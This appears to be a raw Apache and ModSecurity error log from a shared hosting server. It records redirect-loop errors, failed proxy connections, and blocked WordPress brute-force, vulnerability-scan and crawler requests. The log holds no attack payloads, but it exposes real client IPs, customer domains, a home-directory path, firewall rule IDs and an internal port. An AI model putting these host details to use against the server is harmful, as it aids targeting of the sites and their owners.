[Tue May 26 14:08:29.879890 2026] [core:error] [pid 585807:tid 586026] [client 208.84.100.152:56498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.879996 2026] [core:error] [pid 585807:tid 586052] [client 208.84.100.152:56482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880008 2026] [core:error] [pid 585807:tid 586052] [client 208.84.100.152:56482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880227 2026] [core:error] [pid 585807:tid 585972] [client 208.84.100.152:56474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880241 2026] [core:error] [pid 585807:tid 585972] [client 208.84.100.152:56474] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880435 2026] [core:error] [pid 585807:tid 586017] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880447 2026] [core:error] [pid 585807:tid 586017] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880576 2026] [core:error] [pid 585807:tid 585970] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880588 2026] [core:error] [pid 585807:tid 585970] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880686 2026] [core:error] [pid 585807:tid 586028] [client 208.84.100.152:56544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880696 2026] [core:error] [pid 585807:tid 586028] [client 208.84.100.152:56544] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880713 2026] [core:error] [pid 585807:tid 586023] [client 208.84.100.152:56478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880727 2026] [core:error] [pid 585807:tid 586023] [client 208.84.100.152:56478] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880833 2026] [core:error] [pid 585807:tid 585968] [client 208.84.100.152:56508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.880855 2026] [core:error] [pid 585807:tid 585968] [client 208.84.100.152:56508] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.882154 2026] [core:error] [pid 585807:tid 585941] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.882169 2026] [core:error] [pid 585807:tid 585941] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.955325 2026] [core:error] [pid 585807:tid 585960] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.955341 2026] [core:error] [pid 585807:tid 585960] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:30.028126 2026] [core:error] [pid 585807:tid 585966] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:30.028154 2026] [core:error] [pid 585807:tid 585966] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:31.372978 2026] [security2:error] [pid 585807:tid 585972] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcBuHp6I37JgAKrHULVwAAAKc"]
[Tue May 26 14:08:33.399602 2026] [security2:error] [pid 585807:tid 585978] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcCOHp6I37JgAKrHULhQAAAK0"]
[Tue May 26 14:08:35.923179 2026] [security2:error] [pid 585807:tid 586052] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcC-Hp6I37JgAKrHULygAAAPY"]
[Tue May 26 14:08:38.069758 2026] [security2:error] [pid 585807:tid 586063] [client 72.68.209.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcDeHp6I37JgAKrHUMAwAAAQE"]
[Tue May 26 14:08:38.189209 2026] [security2:error] [pid 585807:tid 586062] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcDeHp6I37JgAKrHUMCgAAAQA"]
[Tue May 26 14:08:38.527580 2026] [security2:error] [pid 585807:tid 586026] [client 114.119.139.115:35979] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVcDuHp6I37JgAKrHUMHwAAAN0"], referer: https://glorodavionics.com?route=product/product&path=72_79_130&product_id=180
[Tue May 26 14:08:39.547920 2026] [security2:error] [pid 585807:tid 585997] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcD-Hp6I37JgAKrHUMNAAAAMA"]
[Tue May 26 14:08:40.307991 2026] [security2:error] [pid 585807:tid 585947] [client 202.141.30.10:35488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcEOHp6I37JgAKrHUMVgAAAI8"]
[Tue May 26 14:08:40.308110 2026] [security2:error] [pid 585807:tid 585947] [client 202.141.30.10:35488] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcEOHp6I37JgAKrHUMVgAAAI8"]
[Tue May 26 14:08:42.114185 2026] [security2:error] [pid 585807:tid 585960] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcEeHp6I37JgAKrHUMgQAAAJs"]
[Tue May 26 14:08:43.416111 2026] [security2:error] [pid 585807:tid 585892] [remote 74.7.241.58:36990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVcE-Hp6I37JgAKrHUMuwAAsFQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/vi
[Tue May 26 14:08:43.719045 2026] [security2:error] [pid 585807:tid 586007] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcE-Hp6I37JgAKrHUMswAAAMo"]
[Tue May 26 14:08:46.159471 2026] [security2:error] [pid 585807:tid 585973] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcFeHp6I37JgAKrHUNBgAAAKg"]
[Tue May 26 14:08:46.196118 2026] [security2:error] [pid 585807:tid 585876] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVcFuHp6I37JgAKrHUNEAAAtkQ"]
[Tue May 26 14:08:46.196319 2026] [security2:error] [pid 585807:tid 585987] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVcFuHp6I37JgAKrHUNEAAAtkQ"]
[Tue May 26 14:08:47.721122 2026] [security2:error] [pid 585807:tid 586007] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcF-Hp6I37JgAKrHUNLwAAAMo"]
[Tue May 26 14:08:50.327148 2026] [security2:error] [pid 585807:tid 585974] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcGeHp6I37JgAKrHUNmgAAAKk"]
[Tue May 26 14:08:51.213231 2026] [security2:error] [pid 585807:tid 585950] [client 185.191.171.17:37708] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVcG-Hp6I37JgAKrHUNxQAAAJI"]
[Tue May 26 14:08:51.213346 2026] [security2:error] [pid 585807:tid 585950] [client 185.191.171.17:37708] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVcG-Hp6I37JgAKrHUNxQAAAJI"]
[Tue May 26 14:08:51.232193 2026] [security2:error] [pid 585807:tid 585962] [client 202.141.30.10:35429] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcG-Hp6I37JgAKrHUNxgAAAJ0"]
[Tue May 26 14:08:51.232283 2026] [security2:error] [pid 585807:tid 585962] [client 202.141.30.10:35429] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcG-Hp6I37JgAKrHUNxgAAAJ0"]
[Tue May 26 14:08:51.525417 2026] [security2:error] [pid 585807:tid 586005] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcG-Hp6I37JgAKrHUNwAAAAMg"]
[Tue May 26 14:08:55.172278 2026] [security2:error] [pid 585807:tid 586024] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcHuHp6I37JgAKrHUOKQAAANs"]
[Tue May 26 14:08:55.220944 2026] [security2:error] [pid 585807:tid 585915] [remote 123.30.233.13:39576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVcH-Hp6I37JgAKrHUOPQAA5Gs"]
[Tue May 26 14:08:55.833021 2026] [security2:error] [pid 585807:tid 586057] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcH-Hp6I37JgAKrHUOQwAAAPs"]
[Tue May 26 14:08:56.720266 2026] [security2:error] [pid 585807:tid 585952] [client 40.77.167.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahVcHuHp6I37JgAKrHUOGgAAlFg"]
[Tue May 26 14:08:58.438381 2026] [security2:error] [pid 585807:tid 586002] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcIuHp6I37JgAKrHUOlAAAAMU"]
[Tue May 26 14:09:00.001654 2026] [security2:error] [pid 585807:tid 586052] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcI-Hp6I37JgAKrHUOygAAAPY"]
[Tue May 26 14:09:00.676805 2026] [security2:error] [pid 585807:tid 586009] [client 14.236.14.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcJOHp6I37JgAKrHUO3AAAAMw"]
[Tue May 26 14:09:02.196435 2026] [security2:error] [pid 585807:tid 585981] [client 202.141.30.10:35532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcJuHp6I37JgAKrHUPHQAAALA"]
[Tue May 26 14:09:02.196558 2026] [security2:error] [pid 585807:tid 585981] [client 202.141.30.10:35532] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcJuHp6I37JgAKrHUPHQAAALA"]
[Tue May 26 14:09:02.365137 2026] [security2:error] [pid 585807:tid 586015] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcJeHp6I37JgAKrHUPGQAAANI"]
[Tue May 26 14:09:02.683343 2026] [security2:error] [pid 585807:tid 586052] [client 45.33.14.5:0] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/index.php"] [unique_id "ahVcJeHp6I37JgAKrHUPCQAAAPY"]
[Tue May 26 14:09:02.683884 2026] [security2:error] [pid 585807:tid 586001] [client 45.33.14.5:56676] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahVcJeHp6I37JgAKrHUPBwAAAMQ"]
[Tue May 26 14:09:03.371906 2026] [security2:error] [pid 585807:tid 585829] [remote 17.22.237.132:43032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 132.237.22.17.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "pgcsi.org.in"] [uri "/pgcsi-about-india.php"] [unique_id "ahVcJ-Hp6I37JgAKrHUPRgAA0BU"]
[Tue May 26 14:09:03.916251 2026] [security2:error] [pid 585807:tid 586006] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcJ-Hp6I37JgAKrHUPTwAAAMk"]
[Tue May 26 14:09:04.872708 2026] [security2:error] [pid 585807:tid 586036] [client 45.33.109.18:51031] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahVcKOHp6I37JgAKrHUPfwAAAOc"]
[Tue May 26 14:09:06.684213 2026] [security2:error] [pid 585807:tid 586045] [client 101.47.25.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVcKeHp6I37JgAKrHUPlgAAAO8"]
[Tue May 26 14:09:06.795539 2026] [security2:error] [pid 585807:tid 585981] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcKuHp6I37JgAKrHUPpwAAALA"]
[Tue May 26 14:09:07.069611 2026] [proxy:error] [pid 585807:tid 586007] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:09:07.069688 2026] [proxy_http:error] [pid 585807:tid 586007] [client 205.210.31.164:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:09:07.070296 2026] [proxy:error] [pid 585807:tid 586007] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:09:07.070348 2026] [proxy_http:error] [pid 585807:tid 586007] [client 205.210.31.164:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:09:08.670456 2026] [security2:error] [pid 585807:tid 586049] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcLOHp6I37JgAKrHUP4AAAAPM"]
[Tue May 26 14:09:09.971298 2026] [security2:error] [pid 585807:tid 585966] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcLeHp6I37JgAKrHUQDgAAAKE"]
[Tue May 26 14:09:10.573853 2026] [security2:error] [pid 585807:tid 585843] [remote 167.71.130.119:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVcLuHp6I37JgAKrHUQIwAAmiM"]
[Tue May 26 14:09:12.062524 2026] [security2:error] [pid 585807:tid 585984] [client 173.255.221.189:46854] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "pronumbers.com.au"] [uri "/400.shtml"] [unique_id "ahVcMOHp6I37JgAKrHUQTwAAALM"]
[Tue May 26 14:09:12.389601 2026] [security2:error] [pid 585807:tid 585950] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcL-Hp6I37JgAKrHUQTgAAAJI"]
[Tue May 26 14:09:13.237701 2026] [security2:error] [pid 585807:tid 586011] [client 202.141.30.10:35384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcMeHp6I37JgAKrHUQbQAAAM4"]
[Tue May 26 14:09:13.237858 2026] [security2:error] [pid 585807:tid 586011] [client 202.141.30.10:35384] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcMeHp6I37JgAKrHUQbQAAAM4"]
[Tue May 26 14:09:14.693215 2026] [security2:error] [pid 585807:tid 586041] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcMuHp6I37JgAKrHUQjQAAAOs"]
[Tue May 26 14:09:16.104641 2026] [security2:error] [pid 585807:tid 586064] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcM-Hp6I37JgAKrHUQsQAAAQI"]
[Tue May 26 14:09:18.246078 2026] [security2:error] [pid 585807:tid 585968] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcNeHp6I37JgAKrHUQ6AAAAKM"]
[Tue May 26 14:09:18.935703 2026] [security2:error] [pid 585807:tid 586040] [client 114.119.133.194:63971] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/lolo-albarini%c6%92o-spain/"] [unique_id "ahVcNuHp6I37JgAKrHURDwAAAOo"], referer: http://haddingtonwines.com/products/corzetti-gavi/
[Tue May 26 14:09:19.685654 2026] [security2:error] [pid 585807:tid 585874] [remote 143.198.203.76:34226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.203.198.143.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVcN-Hp6I37JgAKrHURJAAAwEI"]
[Tue May 26 14:09:20.146928 2026] [security2:error] [pid 585807:tid 585990] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcN-Hp6I37JgAKrHURLgAAALk"]
